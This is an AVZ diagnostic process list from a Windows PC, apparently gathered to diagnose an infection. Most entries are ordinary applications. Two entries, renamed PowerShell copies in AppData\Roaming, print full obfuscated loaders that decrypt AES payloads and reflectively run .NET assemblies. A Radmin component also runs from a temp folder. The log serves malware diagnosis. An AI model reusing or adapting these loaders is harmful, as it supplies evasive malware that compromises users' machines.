Results of system analysis

AVZ 5.67 http://z-oleg.com/secur/avz/

Process List

File namePIDDescriptionCopyrightMD5Information
c:\program files (x86)\gigabyte\appcenter\apcent.exe
Script: Quarantine, Delete, Delete via BC, Terminate
13820ApCentCopyright © 2015A4483DD133DBB74B8DF11C11A2C68E632404.88 kb, rsAh,created: 10.05.2022 13:46:08,modified: 10.05.2022 13:46:08
Command line: "C:\Program Files (x86)\GIGABYTE\AppCenter\ApCent.exe"
c:\program files\common files\apple\mobile device support\applemobiledeviceservice.exe
Script: Quarantine, Delete, Delete via BC, Terminate
6140MobileDeviceService© 2022 Apple Inc. All rights reserved.6A9C1ADD1BCDD4B0805284914DD0BB6B100.84 kb, rsAh,created: 08.10.2022 03:00:46,modified: 08.10.2022 03:00:46
Command line:
c:\users\isaac\appdata\local\temp\5d3l4qk2.wbn\getsysteminfodllcache\avz\avz.exe
Script: Quarantine, Delete, Delete via BC, Terminate
249689810173F62BA5DE6F9028BC5D221814D9084.14 kb, rsAh,created: 23.07.2023 13:29:15,modified: 21.03.2023 10:09:05
Command line: "C:\Users\Isaac\AppData\Local\Temp\5d3l4qk2.wbn\GetSystemInfoDllCache\avz\avz.exe" SpoolLog="C:\Users\Isaac\AppData\Local\Temp\5d3l4qk2.wbn\GetSystemInfo\avz.log" TempFolder="C:\Users\Isaac\AppData\Local\Temp\5d3l4qk2.wbn\GetSystemInfo\AvzTemp"
c:\program files (x86)\bookingdesktopapp\update\bookingdesktopappupdate.exe
Script: Quarantine, Delete, Delete via BC, Terminate
4412bookingDesktopApp UpdateCopyright 2007-2010 Google Inc.066C52A2E24BDE844BD8A0460368CCC4100.00 kb, rsAh,created: 29.09.2020 19:53:40,modified: 29.09.2020 19:53:39
Command line: "C:\Program Files (x86)\bookingDesktopApp\Update\bookingDesktopAppUpdate.exe" /c
c:\program files (x86)\bookingdesktopapp\update\bookingdesktopappupdate.exe
Script: Quarantine, Delete, Delete via BC, Terminate
23568bookingDesktopApp UpdateCopyright 2007-2010 Google Inc.066C52A2E24BDE844BD8A0460368CCC4100.00 kb, rsAh,created: 29.09.2020 19:53:40,modified: 29.09.2020 19:53:39
Command line: "C:\Program Files (x86)\bookingDesktopApp\Update\bookingDesktopAppUpdate.exe" /ua /installsource core
c:\program files (x86)\bookingdesktopapp\update\bookingdesktopappupdate.exe
Script: Quarantine, Delete, Delete via BC, Terminate
25520bookingDesktopApp UpdateCopyright 2007-2010 Google Inc.066C52A2E24BDE844BD8A0460368CCC4100.00 kb, rsAh,created: 29.09.2020 19:53:40,modified: 29.09.2020 19:53:39
Command line: "C:\Program Files (x86)\bookingDesktopApp\Update\bookingDesktopAppUpdate.exe" /svc
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
14140Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
5404Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
4820Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
7696Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
22024Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
16368Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
17864Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
24756Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
4692Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
23516Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
14412Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
16252Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
10452Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
24236Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
24828Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
24832Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
5804Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
25412Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
22728Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
22324Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
16608Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
23700Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
19536Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
23420Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
11448Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
24632Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
23904Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
14840Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
4120Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
8392Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
4576Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\program files (x86)\google\chrome\application\chrome.exe
Script: Quarantine, Delete, Delete via BC, Terminate
10456Google ChromeCopyright 2023 Google LLC. All rights reserved.33B718A39CEC26ACD224C1531CACE4AB3157.77 kb, rsAh,created: 22.04.2020 08:19:56,modified: 20.07.2023 08:58:14
Command line:
c:\users\isaac\appdata\local\discord\app-1.0.9015\discord.exe
Script: Quarantine, Delete, Delete via BC, Terminate
1344DiscordCopyright (c) 2023 Discord Inc. All rights reserved.A879449582DB4B230254BD585D211E5C133346.27 kb, rsAh,created: 12.07.2023 17:42:13,modified: 12.07.2023 17:42:13
Command line: "C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\Discord.exe" --type=renderer --user-data-dir="C:\Users\Isaac\AppData\Roaming\discord" --standard-schemes --secure-schemes=sentry-ipc --bypasscsp-schemes=sentry-ipc --cors-schemes=sentry-ipc --fetch-schemes=sentry-ipc --service-worker-schemes --streaming-schemes --app-user-model-id=com.squirrel.Discord.Discord --app-path="C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\resources\app.asar" --no-sandbox --no-zygote --autoplay-policy=no-user-gesture-required --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --time-ticks-at-unix-epoch=-1690136115256806 --launch-time-ticks=271576255 --mojo-platform-channel-handle=3624 --field-trial-handle=1472,i,3093661789889788456,14303255259992432667,131072 --disable-features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --enable-node-leakage-in-renderers /prefetch:1
c:\users\isaac\appdata\local\discord\app-1.0.9015\discord.exe
Script: Quarantine, Delete, Delete via BC, Terminate
9696DiscordCopyright (c) 2023 Discord Inc. All rights reserved.A879449582DB4B230254BD585D211E5C133346.27 kb, rsAh,created: 12.07.2023 17:42:13,modified: 12.07.2023 17:42:13
Command line: "C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\Discord.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --user-data-dir="C:\Users\Isaac\AppData\Roaming\discord" --standard-schemes --secure-schemes=sentry-ipc --bypasscsp-schemes=sentry-ipc --cors-schemes=sentry-ipc --fetch-schemes=sentry-ipc --service-worker-schemes --streaming-schemes --mojo-platform-channel-handle=3900 --field-trial-handle=1472,i,3093661789889788456,14303255259992432667,131072 --disable-features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
c:\users\isaac\appdata\local\discord\app-1.0.9015\discord.exe
Script: Quarantine, Delete, Delete via BC, Terminate
20784DiscordCopyright (c) 2023 Discord Inc. All rights reserved.A879449582DB4B230254BD585D211E5C133346.27 kb, rsAh,created: 12.07.2023 17:42:13,modified: 12.07.2023 17:42:13
Command line: "C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\Discord.exe"
c:\users\isaac\appdata\local\discord\app-1.0.9015\discord.exe
Script: Quarantine, Delete, Delete via BC, Terminate
10048DiscordCopyright (c) 2023 Discord Inc. All rights reserved.A879449582DB4B230254BD585D211E5C133346.27 kb, rsAh,created: 12.07.2023 17:42:13,modified: 12.07.2023 17:42:13
Command line: C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\Discord.exe --type=crashpad-handler --user-data-dir=C:\Users\Isaac\AppData\Roaming\discord /prefetch:7 --no-rate-limit --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Isaac\AppData\Roaming\discord\Crashpad --url=https://f.a.k/e --annotation=_productName=discord --annotation=_version=1.0.9015 --annotation=plat=Win32 --annotation=prod=Electron --annotation=ver=22.3.12 --initial-client-data=0x494,0x4b8,0x4bc,0x470,0x4c0,0x8e34d78,0x8e34d88,0x8e34d94
c:\users\isaac\appdata\local\discord\app-1.0.9015\discord.exe
Script: Quarantine, Delete, Delete via BC, Terminate
9212DiscordCopyright (c) 2023 Discord Inc. All rights reserved.A879449582DB4B230254BD585D211E5C133346.27 kb, rsAh,created: 12.07.2023 17:42:13,modified: 12.07.2023 17:42:13
Command line: "C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\Discord.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Isaac\AppData\Roaming\discord" --standard-schemes --secure-schemes=sentry-ipc --bypasscsp-schemes=sentry-ipc --cors-schemes=sentry-ipc --fetch-schemes=sentry-ipc --service-worker-schemes --streaming-schemes --mojo-platform-channel-handle=1828 --field-trial-handle=1472,i,3093661789889788456,14303255259992432667,131072 --disable-features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
c:\users\isaac\appdata\local\discord\app-1.0.9015\discord.exe
Script: Quarantine, Delete, Delete via BC, Terminate
19796DiscordCopyright (c) 2023 Discord Inc. All rights reserved.A879449582DB4B230254BD585D211E5C133346.27 kb, rsAh,created: 12.07.2023 17:42:13,modified: 12.07.2023 17:42:13
Command line: "C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\Discord.exe" --type=gpu-process --user-data-dir="C:\Users\Isaac\AppData\Roaming\discord" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=1568 --field-trial-handle=1472,i,3093661789889788456,14303255259992432667,131072 --disable-features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
c:\program files (x86)\gigabyte\easytuneengineservice\easytuneengineservice.exe
Script: Quarantine, Delete, Delete via BC, Terminate
16716EasyTuneEngineServiceCopyright © 2014 GIGA-BYTE TECHNOLOGY CO., LTD.081B5046F149EED850D3DB8418221270141.22 kb, rsAh,created: 05.11.2020 17:43:28,modified: 05.11.2020 17:43:28
Command line: "C:\Program Files (x86)\GIGABYTE\EasyTuneEngineService\EasyTuneEngineService.exe"
c:\program files (x86)\microsoft gameinput\x64\gameinputsvc.exe
Script: Quarantine, Delete, Delete via BC, Terminate
6796GameInput Host Service© Microsoft Corporation. All rights reserved.EFBB63A705D505FFBD154CC44305457489.50 kb, rsAh,created: 26.02.2023 04:38:52,modified: 26.02.2023 04:38:52
Command line:
c:\program files (x86)\microsoft gameinput\x64\gameinputsvc.exe
Script: Quarantine, Delete, Delete via BC, Terminate
5444GameInput Host Service© Microsoft Corporation. All rights reserved.EFBB63A705D505FFBD154CC44305457489.50 kb, rsAh,created: 26.02.2023 04:38:52,modified: 26.02.2023 04:38:52
Command line:
c:\program files\windowsapps\microsoft.gamingservices_10.75.13001.0_x64__8wekyb3d8bbwe\gamingservices.exe
Script: Quarantine, Delete, Delete via BC, Terminate
7224GamingServices© Microsoft Corporation. All rights reserved.75E50FAC4CEFB615C66DA3E946BEEAB273.45 kb, rsAh,created: 17.03.2023 02:07:08,modified: 17.03.2023 02:07:10
Command line:
c:\program files\windowsapps\microsoft.gamingservices_10.75.13001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe
Script: Quarantine, Delete, Delete via BC, Terminate
7232GamingServices© Microsoft Corporation. All rights reserved.75E50FAC4CEFB615C66DA3E946BEEAB273.45 kb, rsAh,created: 17.03.2023 02:07:08,modified: 17.03.2023 02:07:10
Command line:
c:\program files (x86)\gigabyte\smartsurvey\gbtcarebotservice.exe
Script: Quarantine, Delete, Delete via BC, Terminate
20272GbtCareBotServiceCopyright © 2018 GIGA-BYTE TECHNOLOGY CO., LTD.0A587E589D8E21A328169DF55006F247134.92 kb, rsAh,created: 06.09.2018 15:53:26,modified: 06.09.2018 15:53:26
Command line: "C:\Program Files (x86)\GIGABYTE\SmartSurvey\GbtCareBotService.exe"
c:\users\isaac\appdata\roaming\gmfik.bat.exe
Script: Quarantine, Delete, Delete via BC, Terminate
17660Windows PowerShell© Microsoft Corporation. All rights reserved.B94110F627D2BA6C57EB84A0F9575B27443.50 kb, rSaH,created: 23.07.2023 13:15:56,modified: 05.05.2023 07:56:03
Command line: "C:\Users\Isaac\AppData\Roaming\GmfIK.bat.exe" -w hidden -c $ArcD='CjTnAreajTnAtejTnADecjTnArjTnAypjTnAtorjTnA'.Replace('jTnA', '');$EIyG='ChajTnAngejTnAExtejTnAnsjTnAijTnAonjTnA'.Replace('jTnA', '');$ddrD='TjTnArajTnAnjTnAsjTnAforjTnAmFijTnAnjTnAajTnAlBlojTnAckjTnA'.Replace('jTnA', '');$HZKC='EntjTnArjTnAyPjTnAoinjTnAtjTnA'.Replace('jTnA', '');$fkvT='FrjTnAomBjTnAasejTnA64jTnAStjTnArijTnAngjTnA'.Replace('jTnA', '');$JDCJ='GjTnAetCjTnAurjTnArejTnAntPrjTnAocjTnAejTnAsjTnAsjTnA'.Replace('jTnA', '');$fjGk='SjTnApljTnAitjTnA'.Replace('jTnA', '');$ZJFf='LoajTnAdjTnA'.Replace('jTnA', '');$fsoP='FirsjTnAtjTnA'.Replace('jTnA', '');$GSDe='IjTnAnvjTnAokjTnAejTnA'.Replace('jTnA', '');$WyFb='MaijTnAnMojTnAdujTnAljTnAejTnA'.Replace('jTnA', '');$DKWO='ReadjTnALinjTnAesjTnA'.Replace('jTnA', '');function BrGrP($WUZkx){$aszSW=[System.Security.Cryptography.Aes]::Create();$aszSW.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aszSW.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aszSW.Key=[System.Convert]::$fkvT('Yg9lQU2I/zPr+3hXJdqcZKMekul1bK9pDFef4vEqPDI=');$aszSW.IV=[System.Convert]::$fkvT('fRifPIwAepUdWFOI5v9eiQ==');$qEOhP=$aszSW.$ArcD();$TIDXf=$qEOhP.$ddrD($WUZkx,0,$WUZkx.Length);$qEOhP.Dispose();$aszSW.Dispose();$TIDXf;}function ZhMnz($WUZkx){$TCOnO=New-Object System.IO.MemoryStream(,$WUZkx);$QqCNk=New-Object System.IO.MemoryStream;$XkOAE=New-Object System.IO.Compression.GZipStream($TCOnO,[IO.Compression.CompressionMode]::Decompress);$XkOAE.CopyTo($QqCNk);$XkOAE.Dispose();$TCOnO.Dispose();$QqCNk.Dispose();$QqCNk.ToArray();}$gfDxw=[System.Linq.Enumerable]::$fsoP([System.IO.File]::$DKWO([System.IO.Path]::$EIyG([System.Diagnostics.Process]::$JDCJ().$WyFb.FileName, $null)));$mxqkG=$gfDxw.Substring(3).$fjGk(':');$VYxVc=ZhMnz (BrGrP ([Convert]::$fkvT($mxqkG[0])));$yVtIo=ZhMnz (BrGrP ([Convert]::$fkvT($mxqkG[1])));[System.Reflection.Assembly]::$ZJFf([byte[]]$yVtIo).$HZKC.$GSDe($null,$null);[System.Reflection.Assembly]::$ZJFf([byte[]]$VYxVc).$HZKC.$GSDe($null,$null);
c:\users\isaac\desktop\gsi-6.2.2.43.exe
Script: Quarantine, Delete, Delete via BC, Terminate
14748Kaspersky Get System Info© 2018 AO Kaspersky Lab. All Rights Reserved.6DA67B5B9B64B09F23BBA29CD594E69B13579.77 kb, rsAh,created: 23.07.2023 13:28:36,modified: 23.07.2023 13:27:24
Command line: "C:\Users\Isaac\Desktop\GSI-6.2.2.43.exe"
c:\users\isaac\appdata\local\temp\xbdo.0\gsi.exe
Script: Quarantine, Delete, Delete via BC, Terminate
25572Kaspersky Get System Info2018 AO Kaspersky Lab. All Rights Reserved.E75FC2CB9EE83934BCB818718898B3741332.27 kb, rsAh,created: 23.07.2023 13:28:39,modified: 21.03.2023 10:31:36
Command line: "C:\Users\Isaac\AppData\Local\Temp\xbdo.0\GSI.exe"
c:\program files (x86)\gigabyte\cloudstation_server\homecloud\hcloud.exe
Script: Quarantine, Delete, Delete via BC, Terminate
17504HCLOUDCopyright © Microsoft 2013D4CB529A07F3A8E483288CF31018138C152.29 kb, rsAh,created: 01.03.2016 13:59:14,modified: 01.03.2016 13:59:14
Command line: "C:\Program Files (x86)\Gigabyte\CloudStation_Server\HomeCloud\HCLOUD.exe"
c:\users\isaac\appdata\local\temp\fd369298e4\jweupdater.exe
Script: Quarantine, Delete, Delete via BC, Terminate
19352Radmin componentCopyright © 1999-2017 Famatech Corp. and its licensors. All rights reserved.DFA7432F09124CF6051FBB8A0D48AD6F833132.36 kb, rsah,created: 05.03.2023 23:23:54,modified: 05.03.2023 23:21:53
Command line: "C:\Users\Isaac\AppData\Local\Temp\fd369298e4\jweupdater.exe"
c:\users\isaac\appdata\roaming\kkgac.bat.exe
Script: Quarantine, Delete, Delete via BC, Terminate
16056Windows PowerShell© Microsoft Corporation. All rights reserved.FC02C8A46596C09687741EB41AC48674411.00 kb, rSaH,created: 23.07.2023 02:12:17,modified: 07.05.2022 00:20:22
Command line: "C:\Users\Isaac\AppData\Roaming\kKGAC.bat.exe" $hoqP='MaASJPinMASJPodASJPuASJPleASJP'.Replace('ASJP', '');$icJO='LoASJPadASJP'.Replace('ASJP', '');$PTNQ='EASJPnASJPtASJPrASJPyPoASJPinASJPtASJP'.Replace('ASJP', '');$qOyZ='SASJPpliASJPtASJP'.Replace('ASJP', '');$Pdxo='CASJPrASJPeaASJPtASJPeDASJPecASJPryptASJPorASJP'.Replace('ASJP', '');$TEkt='TranASJPsfoASJPrmASJPFinaASJPlBASJPloASJPckASJP'.Replace('ASJP', '');$xFRM='FroASJPmBaASJPse6ASJP4StASJPriASJPngASJP'.Replace('ASJP', '');$cDSQ='CASJPhASJPaASJPngASJPeASJPExteASJPnsiASJPonASJP'.Replace('ASJP', '');$hMFe='FirASJPstASJP'.Replace('ASJP', '');$dBAR='GetCASJPuASJPrreASJPntASJPProASJPceASJPssASJP'.Replace('ASJP', '');$Wijw='IASJPnvASJPokASJPeASJP'.Replace('ASJP', '');$FOKd='ReASJPadASJPLASJPinASJPesASJP'.Replace('ASJP', '');function IgypD($utrtk){$NjyUn=[System.Security.Cryptography.Aes]::Create();$NjyUn.Mode=[System.Security.Cryptography.CipherMode]::CBC;$NjyUn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$NjyUn.Key=[System.Convert]::$xFRM('ObPQe07WRiYWEUTOpWDEw/EZfBcGQKT9ju4qCcGJuXE=');$NjyUn.IV=[System.Convert]::$xFRM('DgAS1sFB7YAK8VQ/Y81U7Q==');$nkxgc=$NjyUn.$Pdxo();$pgtXE=$nkxgc.$TEkt($utrtk,0,$utrtk.Length);$nkxgc.Dispose();$NjyUn.Dispose();$pgtXE;}function tEuKj($utrtk){$ClWPe=New-Object System.IO.MemoryStream(,$utrtk);$JHyon=New-Object System.IO.MemoryStream;$aZrPy=New-Object System.IO.Compression.GZipStream($ClWPe,[IO.Compression.CompressionMode]::Decompress);$aZrPy.CopyTo($JHyon);$aZrPy.Dispose();$ClWPe.Dispose();$JHyon.Dispose();$JHyon.ToArray();}$pLLSf=[System.Linq.Enumerable]::$hMFe([System.IO.File]::$FOKd([System.IO.Path]::$cDSQ([System.Diagnostics.Process]::$dBAR().$hoqP.FileName, $null)));$XQVFj=$pLLSf.Substring(3).$qOyZ(':');$VsmWT=tEuKj (IgypD ([Convert]::$xFRM($XQVFj[0])));$YKzPU=tEuKj (IgypD ([Convert]::$xFRM($XQVFj[1])));[System.Reflection.Assembly]::$icJO([byte[]]$YKzPU).$PTNQ.$Wijw($null,$null);[System.Reflection.Assembly]::$icJO([byte[]]$VsmWT).$PTNQ.$Wijw($null,$null);
c:\program files\lghub\lghub.exe
Script: Quarantine, Delete, Delete via BC, Terminate
18064LGHUBCopyright (c) Logitech, Inc. 2023CEABE5A2C205F89E68E20D1F04160F0C148462.75 kb, rsAh,created: 23.06.2023 12:22:48,modified: 23.06.2023 12:22:46
Command line:
c:\program files\lghub\lghub.exe
Script: Quarantine, Delete, Delete via BC, Terminate
18132LGHUBCopyright (c) Logitech, Inc. 2023CEABE5A2C205F89E68E20D1F04160F0C148462.75 kb, rsAh,created: 23.06.2023 12:22:48,modified: 23.06.2023 12:22:46
Command line:
c:\program files\lghub\lghub.exe
Script: Quarantine, Delete, Delete via BC, Terminate
19328LGHUBCopyright (c) Logitech, Inc. 2023CEABE5A2C205F89E68E20D1F04160F0C148462.75 kb, rsAh,created: 23.06.2023 12:22:48,modified: 23.06.2023 12:22:46
Command line:
c:\program files\lghub\lghub.exe
Script: Quarantine, Delete, Delete via BC, Terminate
17472LGHUBCopyright (c) Logitech, Inc. 2023CEABE5A2C205F89E68E20D1F04160F0C148462.75 kb, rsAh,created: 23.06.2023 12:22:48,modified: 23.06.2023 12:22:46
Command line:
c:\program files\lghub\lghub_agent.exe
Script: Quarantine, Delete, Delete via BC, Terminate
18324LGHUB AgentCopyright © Logitech, Inc. 202377CCE6601EFC8762B560A28C28F8380046108.25 kb, rsAh,created: 23.06.2023 12:22:49,modified: 23.06.2023 12:22:46
Command line:
c:\program files\lghub\system_tray\lghub_system_tray.exe
Script: Quarantine, Delete, Delete via BC, Terminate
17900G HUBCopyright © Logitech, Inc. 20232D03CA84BF3FB6B27B57DCA2B47D9EF121525.25 kb, rsAh,created: 23.06.2023 12:22:50,modified: 23.06.2023 12:22:47
Command line:
c:\program files\lghub\lghub_updater.exe
Script: Quarantine, Delete, Delete via BC, Terminate
